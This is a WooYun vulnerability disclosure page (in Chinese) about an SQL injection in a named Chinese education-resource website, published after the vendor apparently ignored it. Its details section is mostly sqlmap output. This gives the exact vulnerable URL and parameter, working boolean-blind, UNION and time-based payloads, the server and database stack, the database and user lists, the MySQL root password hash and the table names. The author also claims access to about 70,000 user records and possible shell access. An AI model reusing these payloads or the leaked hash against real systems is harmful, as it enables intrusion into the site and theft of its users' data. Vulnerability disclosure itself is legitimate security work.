当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144146

漏洞标题:某教育资源网注入漏洞可泄露大量重要信息(root 权限,可getshell)

相关厂商:中小学教育资源网

漏洞作者: 路人甲

提交时间:2015-09-30 16:12

修复时间:2015-11-14 16:14

公开时间:2015-11-14 16:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某教育资源网注入漏洞,泄露大量重要信息(root权限,可getshell)

详细说明:

注入漏洞 得到root 密码 连接数据库 泄露大量重要信息,7W多的注册用户 包括账号、密码、邮箱等。。。。 网站权限很大可以getshell 。。。。
链接:http://www.yestime.net/scb/scb.php?id=2427

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2427' AND 8988=8988 AND 'abcx'='abcx
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: id=-8745' UNION ALL SELECT NULL,NULL,CONCAT
(0x3a7673773a,0x54535842
795741465464,0x3a73616c3a),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2427' AND SLEEP(5) AND 'XgVW'='XgVW
---
[21:24:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
available databases [11]:
[*] dnzi
[*] dq
[*] gwy
[*] information_schema
[*] jxfs
[*] kejian
[*] mysql
[*] samht
[*] test
[*] wiki
[*] yh1768
[21:24:00] [INFO] fetching database users
[21:24:00] [WARNING] the SQL query provided does not return any output
[21:24:00] [WARNING] in case of continuous data retrieval problems you are
advis
ed to try a switch '--no-cast' or switch '--hex'
[21:24:00] [INFO] fetching number of database users
[21:24:00] [WARNING] running in a single-thread mode. Please consider
usage of o
ption '--threads' for faster data retrieval
[21:24:00] [INFO] retrieved: 4
[21:24:02] [INFO] retrieved: 'root'@'localhost'
[21:24:29] [INFO] retrieved: 'yh1768'@'localhost'
[21:25:00] [INFO] retrieved: 'root'@'%'
[21:25:16] [INFO] retrieved: 'yh1768'@'%'
database management system users [4]:
[*] 'root'@'%'
[*] 'root'@'localhost'
[*] 'yh1768'@'%'
[*] 'yh1768'@'localhost'
current user: 'root@localhost'
root : *421F9E38BF3518C8E538BB899967A50E07CBEDA0
current database: 'kejian'
article
article_type,
ask, ask_type,
book,
books,
caimiyu,
computer,
computer_type,
cycd,
downcount,
edudown,
flash,
flash_type,
flash2,
geturl,
gkzl,
host,
hycd,
jiaoan,
jiazhang,
jiazhang_type,
jkbj,
jtsh,
jxfs,
jxys,
jxys_book,
jyzx,
keyword,
kszx,
kxjs,
life,
life_type,
lunwen,
lunwen_type,
main,
member,
nnn,
pay,
pinyin,
scb,
scb_type,
shwh,
syjj,
temp,
tempid,
wenxue,
wzlist,
xiehouyu,
xinshang,
xinshang_type,
xyzx,
yhcd,
yingyu,
yingyu_type,
yxyl,
zgbk,
zongjie,
zongjie_type,
zuowen,
zuowen_type


2.png


3.png


4.png


5.png


漏洞证明:

6.png


7.png


8.png

修复方案:

过滤。。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝